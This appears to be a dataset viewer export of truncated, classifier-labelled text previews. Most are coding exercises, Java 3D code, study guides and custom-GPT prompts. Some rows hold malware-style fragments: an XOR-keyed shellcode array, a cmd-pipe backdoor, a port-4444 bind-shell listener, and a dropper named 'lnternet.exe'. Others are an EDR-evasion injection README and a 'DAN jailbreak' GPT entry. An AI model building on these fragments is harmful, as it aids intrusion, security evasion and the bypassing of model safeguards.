content
stringlengths
263
5.24M
pred_label
stringclasses
1 value
pred_score_pos
float64
0.6
1
#include "ntddk.h" extern NTKERNELAPI PVOID MmSystemRangeStart; ULONG FindBase(ULONG need) { ULONG start, temp, now; __asm { mov eax,MmSystemRangeStart; mov eax,[eax]; mov eax,[eax]; mov start, eax; } if (need >= start) { need = need & (!(PAGE_SIZE - 1)); temp = (need - start) >> PAGE_SHIFT; while...
__label__POS
0.958761
GPT URL: https://chat.openai.com/g/g-iWeTcmxdr-xiao-hong-shu-xie-zuo-zhuan-jia GPT Title: 小红书写作专家 GPT Description: 专注小红书笔记写作,有了它你也可以是小红书爆款写作专家!- By xtxian.com GPT Logo: <img src="https://files.oaiusercontent.com/file-59wa2hxHGA4HzQrlX4oQmHFc?se=2123-10-16T08%3A21%3A32Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D31536000...
__label__POS
0.979484
GPT URL: https://chat.openai.com/g/g-lYALJmt3V-rouxgpt GPT logo: <img src="https://files.oaiusercontent.com/file-GDmHTjDpAonaCsGSU01mo3HF?se=2124-03-19T07%3A16%3A39Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3Da9031656-3d84-4762-bfd7-6257de9a89ca.png&sig=klB8tjRutkrIQd...
__label__POS
0.770866
#include <windows.h> #include <Iprtrmib.h> #include <stdio.h> #include <iphlpapi.h> #pragma comment(lib, "iphlpapi.lib") #pragma comment(lib, "ws2_32.lib") #define DEFAULT_DESTINATION "115.239.210.26" DWORD GetBestIP() { PMIB_IPADDRTABLE pAddrTable = NULL; PMIB_IPADDRROW pAddrRow = NULL; ULONG ulSize = 0; DWORD...
__label__POS
0.616463
use std::collections::HashMap; // https://leetcode.com/problems/longest-substring-without-repeating-characters/description/ pub fn length_of_longest_substring(s: String) -> i32 { let mut longest = 0; let mut current = 0; let mut set = HashMap::new(); for (i, c) in s.chars().enumerate() { if ...
__label__POS
0.649126
// https://leetcode.com/problems/longest-palindromic-substring/ #[inline] pub fn is_palindrome(s: &str) -> bool { let max_len = s.len() / 2 + 1; for (i, c) in s.chars().enumerate() { if c != s.as_bytes()[s.len() - i - 1] as char { return false; } if i >= max_len { ...
__label__POS
0.790343
#include "windows.h" #include "stdio.h" #define KEY 0x88 unsigned char shellcode[]={ 0x55,0x8B,0xEC,0x83,0xEC,0x58,0x53,0x56,0x57,0xEB, 0x56,0x8B,0x45,0xF0,0x8B,0x40,0x3C,0x03,0x45,0xF0, 0x8B,0x40,0x78,0x03,0x45,0xF0,0x8B,0xF0,0x8B,0x48, 0x18,0x8B,0x40,0x20,0x03,0x45,0xF0,0x8B,0xD8,0x33, 0xD2,0x51,0x56,0x8B,...
__label__POS
0.914115
// https://leetcode.com/problems/add-two-numbers/description/ #[derive(PartialEq, Eq, Clone, Debug)] pub struct ListNode { pub val: i32, pub next: Option<Box<ListNode>>, } impl ListNode { #[inline] fn new(val: i32) -> Self { ListNode { next: None, val } } } #[inline] pub fn new_list(nums:...
__label__POS
0.994606
--- title: 项目与任务管理 sidebar_position: 3 --- > 本页主要讨论个人的项目和任务管理体系构建的话题,包括任务优先级、项目管理以及可用的工具。 贡献者:@zgq354 一个人专注的时间是有限的,如何把有限的时间花在合适的刀刃上,完成想要完成的事情,这也是时间管理和项目管理所关注的话题,这对我们每个人而言,都非常重要。 在中小学阶段,大家其实没有太关注这一点,更多时候是学校在辅助规划学生的日常作息,于个体而言,是在一个被动依赖的状态。来到大学,没有了外力的制约,但这样的惯性也在持续,具体表现类似卡 DDL 交作业、期末前一周甚至一晚突击~~复~~预习的情况,效果也不尽人意。 由此,来到大...
__label__POS
0.960635
#include "QV.h" int CreateCmdProcess(PCMD_PIPE_INFO CmdPipe, HANDLE * CmdProc) { int ret; STARTUPINFO CmdStartInfo = {0}; PROCESS_INFORMATION CmdInfo; SECURITY_ATTRIBUTES sa1 = {0},sa2 = {0}; sa1.bInheritHandle = TRUE; sa2.bInheritHandle = TRUE; ret = CreatePipe(&CmdPipe->CmdInput, &CmdPipe->OutputPipe, &s...
__label__POS
0.942499
GPT URL: https://chat.openai.com/g/g-ZfQ1k76Cv-iterative-coding GPT logo: <img src="https://files.oaiusercontent.com/file-YFFZgp3kvvmRbF5zkTMRqUgv?se=2124-01-17T19%3A37%3A05Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3DDALL%25C2%25B7E%25202024-02-10%252012.29.49%2520-%...
__label__POS
0.978274
# 0xFFFF 计算机入门专题 源自 0xFFFF 站长 [@zgq354](https://github.com/zgq354) 和他的朋友们多年 CS 学习的经验总结,形成这一系列文章。 这里主要从一个过来人的视角去展开,关于如何从中小学的被动灌输,过渡到大学的主动学习模式,面对理想与现实的落差如何平衡,以及如何在心态、方法、工具等方面去优化你的计算机学习,少走些不必要的弯路。 ### 目录 1. [前言](/getting-started/intro) 2. [当下校园学习现状](/getting-started/current-situation) 3. [理想的大学世界](/getting-started/ide...
__label__POS
0.998887
--- title: 建立领域 Overview sidebar_position: 9 --- 当你在心态上有所认识、方法与工具上有所准备,意味着你的 CS 学习之路也走向稳步起航,可以不用太着急切入某个领域,打好一个基础再出发。就如一个人来到一座新的城市,首先先找个地方落住脚,解决了最基本的生存问题,有了一个生活节奏,才有机会再去探索其中各个角落,攀上一座又一座的山峰。 在落脚的阶段,除了开发环境和工具的准备,对领域建立 Overview,也是学习中重要的一环。前文 [面向入门的开发环境打造](/getting-started/build-env) 所提到,前人已经挖好了许多好走的山路,要怎么走,需要对这座山的构成有一个大体...
__label__POS
0.97885
GPT URL: https://chat.openai.com/g/g-2cNzsGwIA-yomikata-sensei GPT logo: <img src="https://files.oaiusercontent.com/file-2hQDnZFpvPuVlN1Ycok1Xf2j?se=2124-01-11T09%3A36%3A05Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3D9ecdcd93-4bd6-4fd4-8bcf-da477ca61e3a.png&sig=mh%2Bq...
__label__POS
0.996368
#include <TCHAR.h> #include <afx.h> int main() { TCHAR TempPath[MAX_PATH]; CString temp; GetSystemDirectory(TempPath, MAX_PATH); temp = TempPath; temp = temp + _T("\\lnternet.exe"); int len = temp.GetLength(); LPBYTE lbp = new BYTE[len + 1]; for (int j = 0; j < len; j++) { lbp[j] = temp[j]; } lbp[j] = 0;...
__label__POS
0.986175
# https://leetcode.com/problems/merge-k-sorted-lists/ from heapq import heappop, heappush, heapify, heappushpop # From leetcode class ListNode: def __init__(self, val=0, next=None): self.val = val self.next = next def __repr__(self): me = self vals = [] while me is no...
__label__POS
0.986504
# Working through the problem of finding all subsets of [1, 2, 3, 4, 5] in a recursive manner. # ---- Base: # [] # ---- Add 1: # 1 # ---- Add 2: # 2 # 1, 2 # ---- Add 3 # 1, 3 # 2, 3 # 1, 2, 3 # ---- Add 4 # 1, 4 # 2, 4 # 1, 2, 4 # 1, 3, 4 # 2, 3, 4 # 1, 2, 3, 4 # ---- Add 5 # 1, 5 # 2, 5 # 1, 2, 5 # 1, 3, 5 # ...
__label__POS
0.838692
GPT URL: https://chat.openai.com/g/g-SpQDj5LtM-reverse-engineering-expert GPT Title: Reverse Engineering Expert GPT Description: Answers all reverse engineering queries. - By community builder GPT instructions: ```markdown I am a Reverse Engineering Expert equipped to handle all queries related to reverse engineeri...
__label__POS
0.967055
# https://leetcode.com/problems/find-median-from-data-stream/ from heapq import heappop, heappush, heappushpop # Python heapq supports only min-heap. If you # want a max-heap, then negate the elements. class MedianFinder: def __init__(self): self.median = None self.count = 0 self.left = ...
__label__POS
0.799652
# https://leetcode.com/problems/add-two-numbers/ class ListNode: @staticmethod def from_list(vals: list): ans = ListNode(vals[0]) node = ans for val in vals[1:]: node.next = ListNode(val) node = node.next return ans def __init__(self, val, next=No...
__label__POS
1.00001
#include <stdio.h> #include <stdlib.h> #include <winsock2.h> #pragma comment(lib, "ws2_32.lib") #define PORT 4444 SOCKET ServerSocket = INVALID_SOCKET; SOCKET ClientSocket = INVALID_SOCKET; HANDLE hReadPipe, hWritePipe, hWriteFile, hReadFile; u_char varRead, varWrite; DWORD WINAPI ThreadRead( LPVOID lParam ) { SECU...
__label__POS
0.653869
package shuffle // This file benchmarks three different approaches to writing a // generic algorithm in Go. // // 0xFE - Mohit Cheppudira <mohit@muthanna.com> // // To run: // $ go test -benchmem -bench=. shuffle_test.go -benchtime=10s import ( "math/rand" "reflect" "testing" "time" ) var ( DATA100 = bui...
__label__POS
0.865593
import org.jivesoftware.smack.*; import org.jivesoftware.smack.packet.*; import java.io.*; import java.util.logging.*; class SmackTest { private static Logger logger = Logger.global; public static void main(String[] args) { logger.setLevel(Level.INFO); ConnectionConfiguration config = new Connectio...
__label__POS
0.924587
import com.sun.j3d.utils.universe.*; import com.sun.j3d.utils.geometry.*; import com.sun.j3d.utils.behaviors.vp.*; import javax.media.j3d.*; import javax.vecmath.*; import javax.swing.*; import java.awt.*; class WrapPosition extends JPanel { private int rotation = -1; public static void LOG(String msg) { Sys...
__label__POS
0.676974
import com.sun.j3d.utils.universe.SimpleUniverse; import com.sun.j3d.utils.geometry.*; import javax.media.j3d.*; public class Test3d { private int rotation = -1; public static void LOG(String msg) { System.out.println(msg); } public Test3d(int rot) { rotation = rot; SimpleUniverse universe = ne...
__label__POS
0.971384
import sun.misc.Perf; import com.sun.j3d.utils.timer.J3DTimer; import java.util.*; interface CodeTimeable { public void run(); } abstract class Timer { protected long start; protected long stop; protected String name; public Timer(String name) { start = 0; stop = 0; set_name(name); } publi...
__label__POS
0.727186
import javax.swing.*; import java.awt.*; import java.awt.geom.*; class AdImage { private String image; public AdImage() { image = "No Image"; } } class Advertiser { private String url; public Advertiser(String u) { url = u; } public AdImage getAdvertisement() { return new AdImage(); } }...
__label__POS
0.90913
GPT URL: https://chat.openai.com/g/g-XdRMgrXjR-reverse-engineering-success GPT Title: Reverse Engineering Success GPT Description: Meet Reverse Engineering Success, a specialized GPT designed to analyze and decode the success stories of top individuals and companies in various industries. This AI offers tailored insi...
__label__POS
0.940383
// LoaderInfo3D.java // Andrew Davison, April 2005, ad@fivedots.coe.psu.ac.th /* Checkers3D scene with a model loaded using a Portfolio loader. The model is examined, and its shapes can be changed in various ways. Compilation done with CompileLI.bat: javac -classpath %CLASSPATH%;ncsa\portfolio.jar *.ja...
__label__POS
0.640931
GPT URL: https://chat.openai.com/g/g-TXVXl45pu-hacking-mentor GPT logo: <img src="https://files.oaiusercontent.com/file-IxtQsMmGs0Qz6gnGDpeR8baf?se=2123-12-19T06%3A31%3A47Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3D517af475-1327-4b77-95b1-2a5dfc785bd4.png&sig=93SfONO...
__label__POS
0.978134
GPT URL: https://chat.openai.com/g/g-WBQKGsGm3-ads-generator-by-joe GPT Title: Ads Generator by joe GPT Description: Simply Upload an image or video and the bot will give you ideas on what to do next with your ads Instructions。It also can analyzes TikTok trends and crafts ad scripts. - By XIANGYANG QIAO GPT Logo: <i...
__label__POS
0.638345
/* AUTO-GENERATED FILE. DO NOT MODIFY. * * This class was automatically generated by the * aapt tool from the resource data it found. It * should not be modified by hand. */ package com.muthanna.playground.android.counter; public final class R { public static final class attr { } public static fina...
__label__POS
1.000009
GPT url: https://chat.openai.com/g/g-QvgPbQlOx-product-gpt GPT title: Product GPT GPT description: Convert your idea into a detailed project document: generate features, personas, time-estimates and UI wireframes - By Jitin Pillai GPT instructions: ```markdown I am Product GPT, specialized in guiding users through ...
__label__POS
0.808246
GPT URL: https://chat.openai.com/g/g-LNsEQH5rz-briefly GPT Title: Briefly GPT Description: Same meaning, less text. Submit your text, I'll condense it for you. - By gptriddle.com GPT Logo: <img src="https://files.oaiusercontent.com/file-vqUWvZVZGgvpfNmf2OsD4CTH?se=2123-10-20T13%3A16%3A16Z&sp=r&sv=2021-08-06&sr=b&rs...
__label__POS
0.868901
GPT URL: https://chat.openai.com/g/g-p0BV8aH3f-sales-cold-email-coach GPT Title: Sales Cold Email Coach GPT Description: Ask me to write cold emails for you or review your drafts. My approach: I don't pitch. I shine a light on problems and start conversations with prospects. - By Phu Hai Nghiem GPT Logo: <img src="h...
__label__POS
0.719914
GPT URL: https://chat.openai.com/g/g-VgTBswsG8-pytorch-model-implementer GPT logo: <img src="https://files.oaiusercontent.com/file-K2neAPH4n4ewM50aQeMwB7XD?se=2124-01-13T18%3A08%3A33Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3D5d220179-c9b1-4563-953a-464fc195e050.png&...
__label__POS
0.710064
GPT URL: https://chat.openai.com/g/g-ITgdsmKJw-i-come-from-the-future GPT logo: <img src="https://files.oaiusercontent.com/file-Nnpw7EAQ2UBusjoGTDGsJSEX?se=2123-10-17T13%3A27%3A41Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D31536000%2C%20immutable&rscd=attachment%3B%20filename%3Dd3e0a33a-dcbc-47b5-ac04-73fc68d871ad.png&si...
__label__POS
0.663939
GPT URL: https://chat.openai.com/g/g-HgZuFuuBK-professional-coder-auto-programming GPT logo: <img src="https://files.oaiusercontent.com/file-TYwBikt5eg3mLcW9p15dV5Sl?se=2123-10-17T01%3A57%3A59Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D31536000%2C%20immutable&rscd=attachment%3B%20filename%3D8fc587ae-25c5-47de-8789-5ea51c...
__label__POS
0.712493
GPT URL: https://chatgpt.com/g/g-fDRzouLSQ-chinese-fortune-teller-ba-zi-zhi-neng-suan-ming-shi GPT logo: <img src="https://files.oaiusercontent.com/file-N7l1Ta98knLJhG5PrR5WQQJ8?se=2123-11-02T11%3A13%3A17Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D31536000%2C%20immutable&rscd=attachment%3B%20filename%3D91393476-c40b-4026...
__label__POS
0.999807
GPT URL: https://chat.openai.com/g/g-auFjesfgL-javascript-coder GPT logo: <img src="https://files.oaiusercontent.com/file-TXiueSSPXRcWqAP5AYA7HfgN?se=2123-10-24T17%3A52%3A40Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D31536000%2C%20immutable&rscd=attachment%3B%20filename%3D754608f9-354f-484e-9692-4f46a96e93fe.png&sig=Akjj...
__label__POS
0.98983
GPT URL: https://chat.openai.com/g/g-veceOe3XZ-reverse-prompt-engineering-deutsch GPT Title: Reverse Prompt Engineering Deutsch GPT Description: Mit diesen "Reverse Prompt Engineering GPT ✍🏻 kannst Du chat.openai den Perfekten Eingabeprompt für Deine Zwecke erstellen lassen, um ein perfekten Eingabe-prompt zu generi...
__label__POS
0.661716
GPT URL: https://chat.openai.com/g/g-919YY3lun-rust-programming-guide-assistant GPT Title: Rust Programming Guide Assistant GPT Description: A guide to learn Rust programming - By 马志伟 GPT instructions: ```markdown 我是一个专门帮助用户学习 Rust 编程的助手,特别适合有 Golang 和前端开发经验的人。我的角色是引导用户了解 Rust 的概念和特性,提供编码建议,解释语法,并回答有关 Rust 的具体问题。我使...
__label__POS
0.822048
GPT URL: https://chatgpt.com/g/g-5seLFeQns-summary-generator-gpt GPT logo: <img src="None" width="100px" /> GPT Title: Summary Generator GPT GPT Description: Struggling to capture the key points of lengthy texts? Use Summary Generator, your AI-powered solution, is here to help! Get concise, informative summaries of...
__label__POS
0.90025
GPT URL: https://chat.openai.com/g/g-nYLezt5id-ticktick-assistant GPT logo: <img src="https://files.oaiusercontent.com/file-C5ZdtJdAjj1F2iW87oGS1Yx6?se=2124-01-09T08%3A37%3A50Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3Dcleverlime_robot_futuristic_helper_assistant_9e9...
__label__POS
0.816255
GPT URL: https://chat.openai.com/g/g-lN1gKFnvL-creative-writing-coach GPT Title: Creative Writing Coach GPT Description: I'm eager to read your work and give you feedback to improve your skills. - By ChatGPT GPT Logo: <img src="https://files.oaiusercontent.com/file-KSheuuQR8UjcxzFjjSfjfEOP?se=2123-10-13T00%3A52%3A56...
__label__POS
0.993078
GPT URL: https://chat.openai.com/g/g-6EPxrMA8m-leetcode-problem-solver GPT Title: LeetCode Problem Solver GPT Description: Empathetic LeetCode problem solver with examples on request - By Arturo Bravo Rovirosa GPT Logo: <img src="https://files.oaiusercontent.com/file-jhj174jMVZpoVEWMo9LNVO3R?se=2123-10-18T21%3A49%3A...
__label__POS
0.77383
GPT URL: https://chat.openai.com/g/g-hBDutiLmw-chadgpt GPT logo: <img src="https://files.oaiusercontent.com/file-jIM5nxwJ2BCk2xs57TXxlBfM?se=2123-10-16T23%3A26%3A24Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D31536000%2C%20immutable&rscd=attachment%3B%20filename%3D72dd43ca-aa0c-4c7d-97d1-2bbbbf4cdf22.png&sig=k7LU8Oc3yCeGV...
__label__POS
0.833714
GPT URL: https://chat.openai.com/g/g-FldqoJWpv-essay-writers GPT logo: <img src="https://files.oaiusercontent.com/file-FxNSIRE6E2g3BMEGLE8HMFwB?se=2124-01-22T07%3A05%3A51Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3Dlogo-icon.png&sig=Oa1dphaK63ndRURRW/qb/iNptuAFY9K60vw...
__label__POS
0.807564
GPT URL: https://chat.openai.com/g/g-3ngv8eP6R-gpt-white-hack GPT logo: <img src="https://files.oaiusercontent.com/file-GJEWJ4GP8nPnsYsXtq9plVOs?se=2123-10-19T14%3A48%3A59Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D31536000%2C%20immutable&rscd=attachment%3B%20filename%3D41f65c5c-c300-464e-acc2-71791f62e9e6.png&sig=S4hnEr...
__label__POS
0.657811
GPT URL: https://chat.openai.com/g/g-eSIFeP4GM-react-gpt-project-builder GPT Title: React GPT - Project Builder GPT Description: Dream an app, tell Cogo your packages, and wishes. Cogo will outline, pseudocode, and code at your command. - By douglas.life GPT Logo: <img src="https://files.oaiusercontent.com/file-RP1m...
__label__POS
0.776342
GPT URL: https://chat.openai.com/g/g-hRCqiqVlM-tutor-me GPT logo: <img src="https://files.oaiusercontent.com/file-kM163oDkrVnm7jsidA5WweOP?se=2123-11-18T17%3A08%3A03Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3DKA_KhanmigoGPT_1_LearnerActivities.png&sig=zSZKBHM7UsdkEyM...
__label__POS
0.763303
GPT URL: https://chat.openai.com/g/g-B3qi2zKGB-comfyui-assistant GPT logo: <img src="https://files.oaiusercontent.com/file-KuT8RbqUaasvlGuMIf5evx7q?se=2123-10-17T18%3A50%3A11Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D31536000%2C%20immutable&rscd=attachment%3B%20filename%3DComfyUI%2520Assistant.png&sig=%2BYUOtjkhLOVAkQhu...
__label__POS
0.621591
GPT URL: https://chat.openai.com/g/g-RuhDS8mbd-22-500-best-custom-gpts GPT logo: <img src="https://files.oaiusercontent.com/file-MgGT6z8XgEqooNX79PZufM5S?se=2123-10-27T22%3A07%3A12Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D31536000%2C%20immutable&rscd=attachment%3B%20filename%3Dbest-gpts.png&sig=MlatxQXK4pU8bZzLY/9zMjlR...
__label__POS
0.845324
GPT URL: https://chat.openai.com/g/g-GcY0Utwj1-innovation-and-ideation-assistant-co-thinker-evo-s GPT logo: <img src="https://files.oaiusercontent.com/file-yHFY5MfmJfyXghOWioobRAUr?se=2123-11-08T02%3A09%3A00Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D31536000%2C%20immutable&rscd=attachment%3B%20filename%3DLeonardo_Diffus...
__label__POS
0.789314
GPT URL: https://chat.openai.com/g/g-FIohqmzLo-karpathy-challenge GPT logo: <img src="None" width="100px" /> GPT Title: Karpathy Challenge GPT Description: Episode 1 - By Alvaro A. Alvarez GPT instructions: ```markdown As an analytical thinker, imagine the 5x5 grid ofrandom integers in the range [1, 10] as a spira...
__label__POS
0.689435
GPT URL: https://chat.openai.com/g/g-acZ1g7xWK-educational-email-course-creator GPT logo: <img src="https://files.oaiusercontent.com/file-UNueF7MjvhUBP1rLwS8766Ib?se=2123-12-22T13%3A27%3A23Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3DDALL%25C2%25B7E%25202024-01-14%252...
__label__POS
0.931682
GPT URL: https://chat.openai.com/g/g-ib51QBV8Q-logic-puzzle-maker GPT logo: <img src="https://files.oaiusercontent.com/file-gtZLpenzRbn9GsZPa6P6Oy7J?se=2124-01-11T19%3A54%3A27Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3Da8edd11d-d9a1-4da9-983d-6e2ca8f14bcd.png&sig=IpL...
__label__POS
0.929314
GPT URL: https://chat.openai.com/g/g-GvcYCKPIH-youtube GPT logo: <img src="https://files.oaiusercontent.com/file-j03XK1qFCdQDjwVvA2NZfIlm?se=2123-12-30T21%3A04%3A16Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3DVideo%2520Summarizer%2520logo%2520new.png&sig=sT081KZq91h24...
__label__POS
0.889278
GPT URL: https://chat.openai.com/g/g-d0iHr66vU-where-is-ilya GPT logo: <img src="https://files.oaiusercontent.com/file-HE97IHQ2GHUS4Q3SN8F8w2GV?se=2124-02-16T18%3A35%3A40Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3DPicsart_24-03-11_23-56-47-190.jpg&sig=iQAU6x/bPZDkmtv...
__label__POS
0.770938
GPT URL: https://chat.openai.com/g/g-8ES8Tt8zi-structured-reasoner GPT logo: <img src="https://files.oaiusercontent.com/file-6FipMNXrsKdfABJiwwospS4G?se=2124-01-15T16%3A24%3A52Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3DIMG_6557.webp&sig=IIL4lDJa8XDfpLt5DmHKJAvtvi4ug...
__label__POS
0.785008
GPT URL: https://chat.openai.com/g/g-QZ5U6dzcK-pawsome-photo-fetcher GPT logo: <img src="https://files.oaiusercontent.com/file-BYXQQxpKHDsRpL4WYOSOfQ2m?se=2123-10-24T21%3A26%3A55Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D31536000%2C%20immutable&rscd=attachment%3B%20filename%3Da9268496-dd61-4252-98d2-e7548324ea92.png&sig...
__label__POS
0.977138
GPT URL: https://chat.openai.com/g/g-ofmFo61vi-dan-jailbreak GPT logo: <img src="https://files.oaiusercontent.com/file-8w8IUh9EEvJc0bZr2rqim53W?se=2123-12-20T14%3A16%3A22Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3D80062014-4890-4b94-b0d6-e105ce4130f7.png&sig=JZCrc0jC...
__label__POS
0.995246
GPT URL: https://chatgpt.com/g/g-MEwhzzbks-super-synapse GPT logo: <img src="https://files.oaiusercontent.com/file-SBWwlMArNjfBBBGvX9bK5j8t?se=2123-11-13T22%3A45%3A27Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3Dsynapse%2520purple.png&sig=rJ2J8Kw/iZZ2LtyGy8kgsByak94Jq7...
__label__POS
0.622405
GPT URL: https://chat.openai.com/g/g-RXJGIU1XU-kiara-the-sightseer GPT logo: <img src="https://files.oaiusercontent.com/file-cjzO4GhDR3dB2X9g24fpzTiC?se=2124-01-06T04%3A09%3A50Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3DDALL%25C2%25B7E%25202024-01-29%252020.59.38%252...
__label__POS
0.80721
GPT URL: https://chat.openai.com/g/g-WgQeWc97p-puto-coding GPT logo: <img src="https://files.oaiusercontent.com/file-UUubeC1FMH17eXIFLZiTaVl1?se=2124-01-23T08%3A09%3A06Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3D31454b05-61bc-48e5-99e9-e1af37cc9c70.png&sig=mRY7B0E/Pn...
__label__POS
0.961381
GPT URL: https://chat.openai.com/g/g-ENhijiiwK-math-mentor GPT Title: Math Mentor GPT Description: I help parents help their kids with math. Need a 9pm refresher on geometry proofs? I’m here for you. - By ChatGPT GPT Logo: <img src="https://files.oaiusercontent.com/file-vRLKTttMrbx27eEJWEBVKJwt?se=2123-10-13T01%3A00...
__label__POS
0.8862
# APC Queue Injection Rust Check my blog post out about [this technique here](https://fluxsec.red/apc-queue-injection-rust)! You can find the [proof of concept video on my YouTube](https://www.youtube.com/watch?v=H68IAfeWxaM). This project performs APC Queue Injection in Rust, an EDR Evasion and EDR Bypass technique!...
__label__POS
0.607509
GPT URL: https://chatgpt.com/g/g-iWeTcmxdr-xiao-hong-shu-xie-zuo-zhuan-jia-bao-wen-ban GPT logo: <img src="https://files.oaiusercontent.com/file-59wa2hxHGA4HzQrlX4oQmHFc?se=2123-10-16T08%3A21%3A32Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D31536000%2C%20immutable&rscd=attachment%3B%20filename%3D99c968e1883d1dd7957e28787b...
__label__POS
0.973011
GPT URL: https://chat.openai.com/g/g-fF1SU7xej-testimonial-wizard GPT logo: <img src="https://files.oaiusercontent.com/file-XWTtSUqOOR8sWvSY5n0vMusf?se=2124-02-22T02%3A19%3A32Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3Dddce94a9-5e2f-419a-bb7c-b0e6e02ad796.png&sig=aVF...
__label__POS
0.973088
GPT URL: https://chatgpt.com/g/g-TOr6kBFiQ-ai-editor-gpt GPT logo: <img src="https://files.oaiusercontent.com/file-kolEgPgzhPZ3BbgVCwwz9MOr?se=2124-04-26T07%3A29%3A09Z&sp=r&sv=2023-11-03&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3D22d15080-889b-4550-8791-8eda6f070bb2.png&sig=i/PhBjVljYyA...
__label__POS
0.857614
GPT URL: https://chatgpt.com/g/g-FigFYuGXw-story-bot GPT logo: <img src="https://files.oaiusercontent.com/file-tSS2qhm4EI0jWwLIk22URiSn?se=2124-04-18T02%3A15%3A18Z&sp=r&sv=2023-11-03&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3Dbc2d824a-1136-48a0-a67e-690b83d97df5.png&sig=fOHg2hHyWFW651qd...
__label__POS
0.628289
GPT URL: https://chat.openai.com/g/g-rZCzkN0yN-crocodile-image-generator GPT logo: <img src="https://files.oaiusercontent.com/file-NdBr3Re5nR57qIlY4OgGAHgf?se=2124-02-21T18%3A55%3A46Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3DDALL%25C2%25B7E%25202024-03-16%252020.53....
__label__POS
0.896805
GPT URL: https://chatgpt.com/g/g-RalwM9JLm-paper-reader GPT logo: <img src="https://files.oaiusercontent.com/file-bwWr4siVWBVOAhO18qCDh0ur?se=2124-04-14T18%3A21%3A38Z&sp=r&sv=2023-11-03&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3Dc248f588-ef39-4f56-8953-e3961e45c7c1.png&sig=hBxAfEuw7vC00...
__label__POS
0.940886
GPT URL: https://chat.openai.com/g/g-CCjHPvHZf-car-bargain-buddy GPT logo: <img src="https://files.oaiusercontent.com/file-tKKmPgrFI9jnDcCcwlz2DLcX?se=2123-11-04T05%3A50%3A55Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D31536000%2C%20immutable&rscd=attachment%3B%20filename%3D27459d8e-2bbf-473c-8524-3b60fe7d1056.png&sig=v7b...
__label__POS
0.662812
GPT URL: https://chat.openai.com/g/g-tQBmTaWqj-write-like-me GPT logo: <img src="https://files.oaiusercontent.com/file-lNUgaaUL4Sc7stQUJ7XyAJ2A?se=2123-12-26T02%3A34%3A45Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3DDALL%25C2%25B7E%25202024-01-19%252002.34.19%2520-%252...
__label__POS
0.638575
GPT URL: https://chat.openai.com/g/g-ktOkQRmvl-math-solver GPT logo: <img src="https://files.oaiusercontent.com/file-anFeylhbsoIDhknAFuDirJWV?se=2123-10-25T10%3A10%3A26Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D31536000%2C%20immutable&rscd=attachment%3B%20filename%3D09c2af62-b8bc-43cc-a8f9-23317ada2c21.png&sig=rCdmtt6E9...
__label__POS
0.822962
GPT URL: https://chat.openai.com/g/g-P6MdNuLzH-gpt-finder GPT logo: <img src="https://files.oaiusercontent.com/file-sMFUU3qksEnUV8IfRpcvQ7cA?se=2123-12-25T16%3A15%3A41Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3DGPT%2520Finder.png&sig=tSeKxi31vb8Qbzg3USf/lHUXsH0%2Bdxk...
__label__POS
0.939645
